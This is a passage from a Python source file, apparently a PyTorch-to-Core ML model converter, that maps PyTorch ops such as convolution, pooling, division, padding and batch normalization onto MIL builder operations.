# rdar://60175736\n if len(add_inputs) > 2 and add_inputs[2].val != 1:\n raise ValueError(\"ADD does not support scale factor param\")\n x, y = add_inputs[:2]\n if types.is_bool(x.dtype) and types.is_bool(y.dtype):\n add_node = mb.logical_or(x=x, y=y, name=node.name)\n elif types.is_complex(x.dtype) or types.is_complex(y.dtype):\n x_real = mb.complex_real(data=x) if types.is_complex(x.dtype) else x\n x_imag = mb.complex_imag(data=x) if types.is_complex(x.dtype) else 0.0\n y_real = mb.complex_real(data=y) if types.is_complex(y.dtype) else y\n y_imag = mb.complex_imag(data=y) if types.is_complex(y.dtype) else 0.0\n add_node = mb.complex(real_data=mb.add(x=x_real, y=y_real), imag_data=mb.add(x=x_imag, y=y_imag), name=node.name)\n else:\n x, y = promote_input_dtypes([x, y])\n add_node = mb.add(x=x, y=y, name=node.name)\n context.add(add_node)\n\n\n@register_torch_op\ndef cumsum(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n if is_bool(x.dtype):\n x = mb.cast(x=x, dtype='int32')\n res = mb.cumsum(x=x, axis=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef addmm(context, node):\n # addmm(Tensor input, Tensor mat1, Tensor mat2, Scalar beta=1, Scalar alpha=1)\n # output = beta * input + alpha * mat1 * mat2\n\n assert len(node.outputs) == 1\n inputs = 
_get_inputs(context, node, expected=[3, 4, 5])\n    bias = inputs[0]\n    mat1 = inputs[1]\n    mat2 = inputs[2]\n    beta = inputs[3] if len(inputs) > 3 else mb.const(val=1.0)\n    alpha = inputs[4] if len(inputs) > 4 else mb.const(val=1.0)\n\n    if beta.val != 1.0:\n        # Apply scaling factor beta to the bias.\n        bias = mb.mul(x=beta, y=bias, name=bias.name + \"_scaled\")\n        context.add(bias)\n\n    if alpha.val != 1.0:\n        # Apply scaling factor alpha to the input.\n        mat1 = mb.mul(x=alpha, y=mat1, name=mat1.name + \"_scaled\")\n        context.add(mat1)\n\n    # MIL linear will transpose mat2, but addmm expects that mat1 and mat2\n    # can multiply as is. So we add a transpose.\n    mat2 = mb.transpose(x=mat2, perm=[1, 0], name=mat2.name + \"_transposed\")\n    context.add(mat2)\n\n    addmm_node = mb.linear(x=mat1, weight=mat2, bias=bias, name=node.name)\n    context.add(addmm_node)\n\n\n@register_torch_op\ndef linear(context, node):\n    inputs = _get_inputs(context, node, expected=[2, 3])\n    x = inputs[0]\n    W = inputs[1]\n    x, W = promote_input_dtypes([x, W])\n    bias = inputs[2] if len(node.inputs) == 3 else None\n    res = _create_linear_layer(x, W, bias)\n    context.add(res, torch_name=node.name)\n\n\n@register_torch_op(torch_alias=[\"conv2d\", \"convolution\"])\ndef _convolution(context, node):\n    inputs = _get_inputs(context, node)\n\n    x = inputs[0]\n    # PyTorch and MIL have the same weight layout\n    # Conv: [Cout, Cin, *D]\n    # ConvTranspose: [Cin, Cout, *D]\n    weight = inputs[1]\n    bias = inputs[2]\n    strides = inputs[3]\n\n    x, weight = promote_input_dtypes([x, weight])\n\n    # Expand padding. Torch accepts either an int (for all dimensions) or an n-tuple of ints (one per dimension), but\n    # we require a (2 * n)-tuple, where n is the number of spatial dimensions, start and end for each spatial dimension\n    pad = inputs[4].val\n\n    if len(weight.shape) in (3, 4):\n        # 1D and 2D: Need to explicitly state L-R, T-B pad\n        pad = _np.repeat(pad, 2)\n    elif len(weight.shape) == 5:\n        # 3D: Need to explicitly state F-Bk, L-R, T-B pad\n        if type(pad) == int:\n            pad = _np.repeat(pad, 6)\n        elif len(pad) == 3:\n            pad = _np.repeat(pad, 2)\n    else:\n        raise ValueError(\n            \"Invalid weight dimension. Must be 3, 4, or 5 for 1D, 2D, or 3D convolution, respectively.\"\n        )\n\n    dilations = inputs[5]\n    out_pad = None\n    if len(inputs) >= 9:\n        transposed = inputs[6].val\n        out_pad = inputs[7].val\n        group = inputs[8]\n    elif len(inputs) == 7:\n        transposed = False\n        group = inputs[6]\n    else:\n        raise ValueError(\n            \"unexpected number of inputs for node {} ({}): {}\".format(\n                node.name, node.kind, len(inputs)\n            )\n        )\n\n    kwargs = {\n        \"x\": x,\n        \"weight\": weight,\n        \"strides\": strides,\n        \"pad_type\": \"custom\",\n        \"pad\": pad,\n        \"dilations\": dilations,\n        \"groups\": group,\n        \"name\": node.name,\n    }\n    # Bias is optional in PyTorch's convolution.\n    if bias is not None:\n        kwargs[\"bias\"] = bias\n\n    if transposed is True:\n        # Transposed convolution\n        # Handle output_padding using pre-pad or post-crop\n        pre_pad = [0] * len(pad)\n        post_crop = [0] * len(pad)\n\n        if out_pad is not None and any(out_pad):\n            output_padding = [0] * len(pad)\n            # output padding adds additional padding on one side of a dimension\n            # i.e. 
bottom from top-bottom,\n # right from left-right\n # back from front-back\n # Core ML padding structure is similar [top, bottom, left, right]\n # mapping output_padding to simplify further processing!\n #\n # For ConvTranspose2d: [bottom, right] -> [0, b, 0, r]\n output_padding = [\n 0 if i % 2 == 0 else out_pad[i // 2] for i in range(len(pad))\n ]\n if sum(pad) == 0 and any(output_padding):\n raise ValueError(\n \"ConvTranspose configuration of padding=0 and output_padding > 0 not supported!\"\n )\n post_crop = pad.copy()\n pad *= 0\n for i in range(0, len(pad)):\n if post_crop[i] >= output_padding[i]:\n post_crop[i] -= output_padding[i]\n else:\n pre_pad[i] = output_padding[i] - post_crop[i]\n kwargs[\"pad\"] = pre_pad\n if any(pre_pad):\n # Constant pad requires pad to be of length 2*input_rank\n pre_pad = [0] * 2 * (len(x.shape) - 2) + pre_pad\n x = mb.pad(x=x, pad=pre_pad)\n kwargs[\"x\"] = x\n if any(post_crop):\n del kwargs[\"name\"]\n\n conv = mb.conv_transpose(**kwargs)\n if any(post_crop):\n # TODO: rdar://65575826 (PyTorch converter: output_padding mapping to slice\n # instead of crop layer for 1 and 3D ConvTranspose)\n if len(post_crop) == 2 and conv.rank == 3:\n # Number of elements to crop from right = post_crop[-1].\n # Since slicing supports negative indexing, end_id = -1 * post_crop[-1]\n conv = mb.slice_by_index(\n x=conv,\n begin=[0, 0, post_crop[0]],\n end=[0, 0, -1 * post_crop[-1]],\n begin_mask=[True, True, False],\n end_mask=[True, True, False],\n name=node.name,\n )\n elif len(post_crop) == 4 and conv.rank == 4:\n conv = mb.crop(\n x=conv,\n crop_height=post_crop[:2],\n crop_width=post_crop[2:4],\n name=node.name,\n )\n else:\n raise ValueError(\n \"output_padding is supported only for ConvTranspose1D or ConvTranspose2D!\"\n )\n else:\n # Normal convolution\n conv = mb.conv(**kwargs)\n context.add(conv)\n\n\n# Convolution with \"same, valid\" padding\n@register_torch_op\ndef _convolution_mode(context, node):\n inputs = _get_inputs(context, node, expected=7)\n mode = inputs[4].val\n\n context.add(\n mb.conv(\n x=inputs[0],\n weight=inputs[1],\n bias=inputs[2],\n strides=inputs[3],\n pad_type=mode,\n dilations=inputs[5],\n groups=inputs[6],\n name=node.name,\n )\n )\n\n\n@register_torch_op(torch_alias=[\"_softmax\"])\ndef softmax(context, node):\n inputs = _get_inputs(context, node)\n\n x = inputs[0]\n axis = inputs[1]\n res = mb.softmax(x=x, axis=axis, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef flatten(context, node):\n inputs = _get_inputs(context, node)\n\n x = inputs[0]\n dims = list(x.shape)\n start_val = inputs[1].val\n end_val = inputs[2].val\n\n start = len(dims) + start_val if start_val < 0 else start_val\n end = len(dims) + end_val if end_val < 0 else end_val\n\n if start > len(dims) or end > len(dims) or start < 0 or end < 0:\n raise ValueError(\n \"Invalid start and end. (start, end) == ({}, {})\".format(start, end_val)\n )\n if start > end:\n raise ValueError(\n \"Start must be before end. 
(start, end) == ({}, {})\".format(start, end_val)\n )\n x_shape = mb.shape(x=x)\n\n shape1 = mb.slice_by_index(x=x_shape, begin=[0], end=[start])\n shape2 = mb.slice_by_index(x=x_shape, begin=[end + 1], end=[len(dims)])\n\n flatten_dim = -1\n if not any_symbolic(x.shape):\n flatten_dim = 1\n for dim in dims[start: end + 1]:\n flatten_dim *= dim\n\n shape = mb.concat(values=(shape1, [flatten_dim], shape2), axis=0)\n shape = mb.cast(x=shape, dtype=\"int32\")\n reshape = mb.reshape(x=x, shape=shape, name=node.name)\n context.add(reshape)\n\n\n@register_torch_op\ndef _reshape_from_tensor(context, node):\n inputs = _get_inputs(context, node, expected=2)\n\n reshape = mb.reshape(x=inputs[0], shape=inputs[1], name=node.name)\n context.add(reshape)\n\n\n@register_torch_op\ndef softsign(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = mb.softsign(x=inputs[0], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef relu(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = mb.relu(x=inputs[0], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef prelu(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n alpha = inputs[1]\n # In the MIL backend, it assumes that the inputs of prelu should have\n # at least rank 3, i.e. [batch, channel, spatial_dims*].\n if x.rank >= 2:\n alpha = alpha.val\n alpha = _np.ones((x.shape[1],)) * alpha\n\n if x.rank <= 2:\n axes = [1, 2] if x.rank == 1 else [2]\n x = mb.expand_dims(x=x, axes=axes)\n x = mb.prelu(x=x, alpha=alpha)\n res = mb.squeeze(x=x, axes=axes, name=node.name)\n else:\n res = mb.prelu(x=x, alpha=alpha, name=node.name)\n\n context.add(res)\n\n\n@register_torch_op\ndef linspace(context, node):\n inputs = _get_inputs(context, node, min_expected=3)\n\n start = inputs[0]\n end = inputs[1]\n nums = inputs[2]\n start = mb.cast(x=start, dtype=\"fp32\")\n end = mb.cast(x=end, dtype=\"fp32\")\n\n if start.can_be_folded_to_const() and end.can_be_folded_to_const() and nums.can_be_folded_to_const():\n start_val = start.val\n end_val = end.val\n nums_val = nums.val\n if nums_val < MAX_SIZE_CONSTANT_FOLDING:\n res = mb.const(val=_np.linspace(start_val, end_val, nums_val), name=node.name)\n context.add(res)\n return\n\n if nums.val is None:\n msg = \"Dynamic steps input for torch.linspace is not supported. 
Please use torch.arange instead\"\n raise NotImplementedError(msg)\n else:\n if nums.val == 1:\n res = mb.expand_dims(x=start, axes=[0], name=node.name)\n else:\n # step = (end - start) / (nums - 1)\n x = mb.sub(x=end, y=start)\n y = mb.sub(x=nums, y=1)\n x = mb.cast(x=x, dtype=\"fp32\")\n y = mb.cast(x=y, dtype=\"fp32\")\n step = mb.real_div(x=x, y=y)\n\n # Note that the range_1d op excluded the end point,\n # so we have to add the end back to the resulting array.\n arange = mb.range_1d(end=end, start=start, step=step)\n new_end = mb.expand_dims(x=end, axes=[0])\n res = mb.concat(values=[arange, new_end], axis=0, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef relu6(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = mb.relu6(x=inputs[0], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef einsum(context, node):\n vars = context[node.inputs[1]]\n vars = promote_input_dtypes(vars)\n equation = context[node.inputs[0]].val\n x = build_einsum_mil(vars, equation, node.name)\n context.add(x)\n\n\n@register_torch_op\ndef eye(context, node):\n # TODO: rdar://104400568 ([PyTorch] Use MIL ops to construct the eye matrix in order to avoid directly folding the input into a const)\n inputs = _get_inputs(context, node, expected=[5, 6])\n if len(inputs) == 5:\n eye = _np.eye(inputs[0].val)\n if len(inputs) == 6:\n eye = _np.eye(inputs[0].val, inputs[1].val)\n eye = mb.const(val=eye, name=node.name)\n context.add(eye)\n\n\n@register_torch_op\ndef elu(context, node):\n ## Torch port to ATen adds scale and input_scale which is set to 1\n inputs = _get_inputs(context, node, expected=4)\n\n res = mb.elu(x=inputs[0], alpha=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef leaky_relu(context, node):\n inputs = _get_inputs(context, node, expected=2)\n\n res = mb.leaky_relu(x=inputs[0], alpha=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef rrelu(context, node):\n inputs = _get_inputs(context, node, expected=5)\n\n # Alpha in evaluation mode is just the average between upper and lower.\n lower_alpha = inputs[1]\n upper_alpha = inputs[2]\n alpha = (lower_alpha.val + upper_alpha.val) / 2\n\n res = mb.leaky_relu(x=inputs[0], alpha=alpha, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef softplus(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n beta_ = inputs[1].val\n C = x.shape[1]\n alpha_br = _np.repeat(1.0 / beta_, C).astype('float32')\n beta_br = _np.repeat(beta_, C).astype('float32')\n\n res = mb.softplus_parametric(x=x, alpha=alpha_br, beta=beta_br, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef mish(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n\n softplus = mb.softplus(x=x)\n tanh = mb.tanh(x=softplus)\n res = mb.mul(x=x, y=tanh, name=node.name)\n context.add(res)\n\n\ndef _adjust_pad_for_ceil_mode(input_shape, kernel_size, stride_sizes, pad_sizes):\n \"\"\" Given an input tensor and pooling parameters, add the extra input\n padding needed to replicate ceil_mode.\n MIL 3D pooling does not support ceil_mode natively, but we can\n workaround by padding the input appropriately.\n\n PyTorch output size formula for pooling:\n (reference: https://github.com/pytorch/pytorch/blob/375c30a7177442fb9d6de7516a9ae4031ae324c4/aten/src/ATen/native/Pool.h#L28)\n\n When ceil mode is True:\n out_dim = floor((in_dim + pad_l + pad_r - kernel_size + (stride-1)) / stride) + 1\n if (out_dim-1) * stride >= in_dim + pad_l and 
(pad_l > 0 or pad_r > 0):\n            out_dim = out_dim - 1\n    When ceil mode is False:\n        out_dim = floor((in_dim + pad_l + pad_r - kernel_size) / stride) + 1\n\n\n    # follow the approach here to calculate padding:\n    # https://github.com/pytorch/pytorch/blob/edf751ca2fededecdd9366874c761431c0f61f01/aten/src/ATen/native/mkldnn/Pooling.cpp#L121\n    # which keeps increasing the pad_r value until the output size without the ceil mode matches that of the ceil mode\n    \"\"\"\n\n    def _calculate_pool_output_size(in_dim, kernel, stride, pad_l, pad_r, ceil_mode):\n        if ceil_mode:\n            out_dim = _math.floor((in_dim + pad_r + pad_l - kernel + stride - 1) / stride) + 1\n            if (out_dim - 1) * stride >= in_dim + pad_l and (pad_l > 0 or pad_r > 0):\n                out_dim = out_dim - 1\n        else:\n            out_dim = _math.floor((in_dim + pad_r + pad_l - kernel) / stride) + 1\n        return out_dim\n\n    new_pad = pad_sizes.copy()\n    for idx in range(len(input_shape)):\n        if is_symbolic(input_shape[idx]):\n            logger.warning(\n                \"pooling padding adjusted to support ceil_mode=True, for symbolic dimension. \"\n                \"Output shape of the pool op may be wrong for certain input shapes.\"\n            )\n            new_pad[2 * idx + 1] += stride_sizes[idx] - 1\n        else:\n            out_dim_with_ceil_mode = _calculate_pool_output_size(\n                input_shape[idx],\n                kernel_size[idx],\n                stride_sizes[idx],\n                pad_sizes[2 * idx],\n                pad_sizes[2 * idx + 1],\n                True,\n            )\n            is_equal = False\n            while not is_equal:\n                out_dim_without_ceil_mode = _calculate_pool_output_size(\n                    input_shape[idx],\n                    kernel_size[idx],\n                    stride_sizes[idx],\n                    new_pad[2 * idx],\n                    new_pad[2 * idx + 1],\n                    False,\n                )\n                is_equal = True\n                if out_dim_without_ceil_mode < out_dim_with_ceil_mode:\n                    new_pad[2 * idx + 1] += 1\n                    is_equal = False\n\n    return new_pad\n\n\ndef _max_pool(context, node, inputs):\n    x = inputs[0]\n    kernel_sizes = inputs[1]\n    strides = inputs[2]\n    if strides.op.op_type == \"const\" and (not list(strides.val)):\n        strides = mb.const(val=kernel_sizes.val, name=strides.name)\n\n    pad_type = \"custom\"\n\n    pad = np.array([0] * (kernel_sizes.shape[0] * 2)) if len(inputs) < 4 else _np.repeat(inputs[3].val, 2)\n    dilation = np.array([1] * kernel_sizes.shape[0]) if len(inputs) < 5 else inputs[4].val\n    ceil_mode = False if len(inputs) < 6 else inputs[5].val\n\n    if _np.any(dilation > 1):\n        # See: rdar://60633736 (Implement dilation for mil op max_pool)\n        raise ValueError(\"@max_pool does not support dilation > 1\")\n\n    spatial_rank = len(pad) // 2\n    if spatial_rank > 2 and ceil_mode is True and list(strides.val) != [1] * len(strides.val):\n        # since MIL does not support ceil_mode for 3D pool,\n        # need to adjust padding values if ceil_mode is True\n        # ceil_mode only makes a difference if the strides are not 1\n        x_spatial_dimensions = x.shape[-spatial_rank:]\n        pad = _adjust_pad_for_ceil_mode(x_spatial_dimensions, kernel_sizes.val, strides.val, pad)\n\n    pool = mb.max_pool(\n        x=x,\n        kernel_sizes=kernel_sizes,\n        strides=strides,\n        pad_type=pad_type,\n        pad=pad,\n        name=node.name,\n        ceil_mode=ceil_mode if spatial_rank <= 2 else False,\n    )\n\n    if node.kind == \"max_pool2d_with_indices\":\n        # TODO(rdar://117038432) ([Executorch] Handle/Bind other outputs of `max_pool2d_with_indices` op during lowering)\n        context.add((pool, None), torch_name=node.name)\n    else:\n        context.add(pool)\n\n\n@register_torch_op\ndef max_pool1d(context, node):\n    inputs = _get_inputs(context, node, expected=6)\n    _max_pool(context, node, inputs)\n\n\n@register_torch_op(torch_alias=[\"max_pool2d_with_indices\"])\ndef max_pool2d(context, node):\n    inputs = _get_inputs(context, node, 
min_expected=3)\n _max_pool(context, node, inputs)\n\n\n@register_torch_op\ndef max_pool3d(context, node):\n inputs = _get_inputs(context, node, expected=6)\n _max_pool(context, node, inputs)\n\n\n@register_torch_op\ndef minimum(context, node):\n inputs = _get_inputs(context, node, expected=2)\n assert len(node.outputs) == 1\n x = context[node.inputs[0]]\n y = context[node.inputs[1]]\n out = mb.minimum(x=x, y=y, name=node.name)\n context.add(out)\n\n\n@register_torch_op\ndef clamp_min(context, node):\n x = _get_inputs(context, node, expected=2)\n x = mb.clip(x=x[0], alpha=x[1], beta=_np.inf, name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef maximum(context, node):\n inputs = _get_inputs(context, node, expected=2)\n assert len(node.outputs) == 1\n x = context[node.inputs[0]]\n y = context[node.inputs[1]]\n out = mb.maximum(x=x, y=y, name=node.name)\n context.add(out)\n\n\n@register_torch_op(torch_alias = [\"div.tensor\"])\ndef div(context, node):\n inputs = _get_inputs(context, node, expected=[2, 3])\n x = mb.cast(x=inputs[0], dtype=\"fp32\")\n y = mb.cast(x=inputs[1], dtype=\"fp32\")\n\n if len(inputs) > 2 and inputs[2] is not None:\n rounding_mode = inputs[2].val\n if rounding_mode == \"floor\":\n # round towards negative infinity\n # e.g.:\n # values before floor: [2.6, -3.4, -3.6]\n # values after floor: [2, -4, -4]\n res = mb.floor_div(x=x, y=y, name=node.name)\n elif rounding_mode == \"trunc\":\n # round towards 0\n # e.g.:\n # values before trunc: [2.6, -3.4, -3.6]\n # values after trunc: [2, -3, -3]\n z = mb.real_div(x=x, y=y)\n s = mb.sign(x=z)\n all_positive = mb.mul(x=z, y=s)\n all_positive_floor = mb.floor(x=all_positive)\n res = mb.mul(x=all_positive_floor, y=s, name=node.name)\n else:\n raise NotImplementedError(\n 'rounding mode \"{}\" not supported in the \"div\" op'.format(rounding_mode)\n )\n else:\n res = mb.real_div(x=x, y=y, name=node.name)\n\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"floordiv\"])\ndef floor_divide(context, node):\n inputs = _get_inputs(context, node, expected=2)\n inputs = promote_input_dtypes(inputs)\n div_res = mb.floor_div(x=inputs[0], y=inputs[1])\n # Pytorch's floor_divide always returns fp32, even if the inputs are int\n res = mb.cast(x=div_res, dtype='fp32', name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef true_divide(context, node):\n inputs = _get_inputs(context, node, expected=2)\n res = mb.real_div(x=inputs[0], y=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"mul.tensor\", \"mul.scalar\"])\ndef mul(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n if types.is_bool(x.dtype) and types.is_bool(y.dtype):\n res = mb.logical_and(x=x, y=y, name=node.name)\n else:\n res = mb.mul(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef pow(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n res = mb.pow(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"rsub\"])\ndef sub(context, node):\n inputs = _get_inputs(context, node, expected=[2, 3])\n assert len(node.outputs) == 1\n\n if node.kind == \"rsub\":\n # rsub reverses the order of arguments\n y = inputs[0]\n x = inputs[1]\n else:\n x = inputs[0]\n y = inputs[1]\n\n if len(inputs) > 2:\n alpha = inputs[2].val\n\n # TODO (sberardi): 3rd param to aten::sub is a scale factor, need to handle that.\n # out=input-alpha x other\n # rdar://60175736\n if alpha != 1:\n raise 
ValueError(\"SUB does not support scale factor param\")\n\n x, y = promote_input_dtypes([x, y])\n res = mb.sub(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op(\n torch_alias=[\n \"mean.dim\",\n \"sum\",\n \"logsumexp\",\n ]\n)\ndef mean(context, node):\n inputs = _get_inputs(context, node)\n\n x = inputs[0]\n if types.is_bool(x.dtype):\n # TODO: In the future when MIL op supports bool, we need to use curr_opset_version to decide\n # if we want to cast or not.\n x = mb.cast(x=x, dtype=\"fp32\")\n kwargs = {\"x\": x, \"name\": node.name}\n\n # @axes is optional, so omit if None.\n axes = inputs[1]\n if axes is not None:\n # @axes needs to be a list, but if only one axis was specified in the\n # model, it will be constructed as an int. Construct a new constant as a\n # list.\n if not isinstance(axes.val, _np.ndarray):\n axes = mb.const(val=[axes.val], name=axes.name + \"_list\")\n context.add(axes)\n kwargs[\"axes\"] = axes\n\n # @keep_dims is optional.\n if len(inputs) >= 3:\n keep_dims = inputs[2]\n kwargs[\"keep_dims\"] = keep_dims\n\n # Last input to mean is an optional output tensor. We always expect this to\n # be None or absent.\n assert len(inputs) <= 3 or inputs[3] is None\n if node.kind == \"sum\":\n res = mb.reduce_sum(**kwargs)\n elif node.kind == \"logsumexp\":\n res = mb.reduce_log_sum_exp(**kwargs)\n else:\n res = mb.reduce_mean(**kwargs)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"squeeze_copy.dim\", \"squeeze_copy.dims\"])\ndef squeeze(context, node):\n inputs = _get_inputs(context, node)\n if len(inputs) == 1:\n res = mb.squeeze(x=inputs[0], name=node.name)\n elif len(inputs) == 2:\n dims = inputs[1].val\n try:\n dims = (int(dims),)\n except:\n pass\n res = mb.squeeze(x=inputs[0], axes=dims, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"unsqueeze_copy\"])\ndef unsqueeze(context, node):\n inputs = _get_inputs(context, node, expected=2)\n unsqueeze = mb.expand_dims(x=inputs[0], axes=[inputs[1].val], name=node.name)\n context.add(unsqueeze)\n\n\n@register_torch_op\ndef size(context, node):\n inputs = _get_inputs(context, node, expected=[1, 2])\n x = inputs[0]\n\n # Get the shape of the tensor.\n if types.is_complex(x.dtype):\n size_node = mb.complex_shape(x=inputs[0], name=node.name + \"_shape\")\n else:\n size_node = mb.shape(x=inputs[0], name=node.name + \"_shape\")\n\n # Get the size of the tensor along the input dimension.\n if len(node.inputs) == 2:\n dim = inputs[1].val\n size_node = _list_select(size_node, dim)\n context.add(size_node, node.name)\n\n\n@register_torch_op\ndef _shape_as_tensor(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n # Get the shape of the tensor.\n shape_node = mb.shape(x=inputs[0], name=node.name)\n context.add(shape_node, node.name)\n\n\n@register_torch_op(torch_alias=[\"view_copy\", \"reshape\"])\ndef view(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n shape = inputs[1]\n\n if isinstance(shape, ListVar):\n length = mb.list_length(ls=shape)\n indices = mb.range_1d(start=0, end=length, step=1)\n shape = mb.list_gather(ls=shape, indices=indices)\n\n if isinstance(shape, list) and all(\n [isinstance(dim, Var) and len(dim.shape) == 0 for dim in shape]\n ):\n shape = mb.concat(values=shape, axis=0)\n\n shape = mb.cast(x=shape, dtype=\"int32\")\n\n if types.is_complex(x.dtype):\n real, imag = (mb.reshape(x=x, shape=shape, name=node.name) for x in (mb.complex_real(data=x), mb.complex_imag(data=x)))\n view = mb.complex(real_data=real, 
imag_data=imag, name=node.name)\n else:\n view = mb.reshape(x=x, shape=shape, name=node.name)\n\n context.add(view)\n\n\n@register_torch_op(torch_alias=['constant_pad_nd'])\ndef pad(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n\n pad = inputs[1]\n if pad.val is not None:\n pad = pad.val.reshape((-1, 2))[::-1].reshape(-1).tolist()\n missing_dims = x.rank - (len(pad) // 2)\n pad = [0, 0] * missing_dims + pad\n\n if len(inputs) == 4:\n mode = inputs[2].val\n assert mode in ('constant', 'reflect', 'replicate')\n val_index = 3\n else:\n mode = 'constant'\n val_index = 2\n\n scalar_val = inputs[val_index] if inputs[val_index] else 0.0\n if inputs[val_index] and inputs[val_index].op.op_type == \"const\":\n scalar_val = float(scalar_val.val)\n\n if types.is_complex(x.dtype):\n real, imag = (mb.pad(x=x, pad=pad, mode=mode, constant_val=scalar_val, name=node.name) for x in (mb.complex_real(data=x), mb.complex_imag(data=x)))\n res = mb.complex(real_data=real, imag_data=imag, name=node.name)\n else:\n res = mb.pad(x=x, pad=pad, mode=mode, constant_val=scalar_val, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef adaptive_avg_pool1d(context, node):\n _adaptive_pool1d(context, node, mb.reduce_mean)\n\n\n@register_torch_op\ndef adaptive_avg_pool2d(context, node):\n _adaptive_pool2d(context, node, mb.avg_pool, mb.reduce_mean)\n\n\ndef _adaptive_pool1d(context, node, reduce_op):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n assert len(inputs[1].val) == 1\n out_length = inputs[1].val[0]\n\n if len(x.shape) == 3:\n # 3D input\n begin_prefix = [0, 0]\n end_prefix = [x.shape[0], x.shape[1]]\n out_shape = [x.shape[0], x.shape[1], out_length]\n else:\n # 2D input\n assert len(x.shape) == 2\n begin_prefix = [0]\n end_prefix = [x.shape[0]]\n out_shape = [x.shape[0], out_length]\n\n pool_results = []\n for start, end in _get_kernel_indexes_1d_for_adaptive_pooling(x.shape[-1], out_length):\n cur_kernel = mb.slice_by_index(\n x=x,\n begin=begin_prefix + [start],\n end=end_prefix+[end],\n )\n cur_result = reduce_op(\n x=cur_kernel,\n axes=[-1],\n keep_dims=True\n )\n pool_results.append(cur_result)\n \n context.add(\n mb.reshape(\n x=mb.concat(values=pool_results, axis=-1),\n shape=out_shape,\n name=node.name,\n )\n )\n\n\n@register_torch_op\ndef adaptive_max_pool1d(context, node):\n _adaptive_pool1d(context, node, mb.reduce_max)\n\n\n@register_torch_op\ndef adaptive_max_pool2d(context, node):\n _adaptive_pool2d(context, node, mb.max_pool, mb.reduce_max)\n\n\ndef _get_kernel_indexes_1d_for_adaptive_pooling(\n in_dimension: int,\n out_dimension: int) -> List[Tuple[int, int]]:\n results = []\n for i in range(out_dimension):\n start = _math.floor(i * in_dimension / out_dimension)\n end = _math.ceil((i + 1) * in_dimension / out_dimension)\n results.append((start, end))\n return results\n\n\ndef _adaptive_pool2d_non_fixed_kernel_size_and_stride(x, output_shape, name, reduce_op):\n '''\n If the input dimension is not evenly divisible by the output dimension, then the\n stride and kernel size used by PyTorch is not fixed. 
This is true for both the\n height and width dimension.\n '''\n\n pool_results = []\n for s2, e2 in _get_kernel_indexes_1d_for_adaptive_pooling(x.shape[2], output_shape[0]):\n for s3, e3 in _get_kernel_indexes_1d_for_adaptive_pooling(x.shape[3], output_shape[1]):\n cur_kernel = mb.slice_by_index(\n x=x,\n begin=[0, 0, s2, s3],\n end=[x.shape[0], x.shape[1], e2, e3],\n )\n cur_result = reduce_op(\n x=cur_kernel,\n axes=[-2, -1],\n keep_dims=True\n )\n pool_results.append(cur_result)\n\n return mb.reshape(\n x=mb.concat(values=pool_results, axis=-1),\n shape=[x.shape[0], x.shape[1], output_shape[0], output_shape[1]],\n name=name,\n )\n\n\ndef _adaptive_pool2d(context, node, pool_op, reduce_op):\n # Get input tensor and output shape\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n output_shape = inputs[1].val\n assert isinstance(output_shape, _np.ndarray) and len(output_shape) == 2\n output_shape = tuple(output_shape)\n\n if output_shape == (1, 1):\n # Represent (1,1) output size with global reduce op\n result = reduce_op(x=x, axes=[-2, -1], keep_dims=True, name=node.name)\n elif x.shape is None or any_symbolic(x.shape):\n raise ValueError(\n \"Adaptive pooling is only supported when input tensor size is known or output size == (1,1). \"\n \"Received: input size == {}, output size == {}\".format(\n x.shape_str(), output_shape,\n )\n )\n elif x.shape[-2] % output_shape[-2] == 0 and x.shape[-1] % output_shape[-1] == 0:\n # Stride and kernel size are fixed\n strides = [ind // outd for ind, outd in zip(x.shape[-2:], output_shape)]\n kernel_sizes = [\n ind - s * (outd - 1)\n for ind, outd, s in zip(x.shape[-2:], output_shape, strides)\n ]\n result = pool_op(\n x=x,\n kernel_sizes=kernel_sizes,\n strides=strides,\n pad_type=\"valid\",\n name=node.name,\n )\n else:\n result = _adaptive_pool2d_non_fixed_kernel_size_and_stride(\n x, output_shape, node.name, reduce_op\n )\n\n context.add(result)\n\n\n@register_torch_op(torch_alias=[\"_native_batch_norm_legit_no_training\"])\ndef batch_norm(context, node):\n inputs = _get_inputs(context, node, expected=[7, 9])\n\n _input = inputs[0]\n weight = inputs[1]\n bias = inputs[2]\n running_mean = inputs[3]\n running_var = inputs[4]\n\n if len(inputs) == 9:\n # inputs skipped:\n # float momentum (6)\n # bool cudnn_enabled (8)\n\n training = inputs[5].val\n eps = inputs[7]\n # no: training, 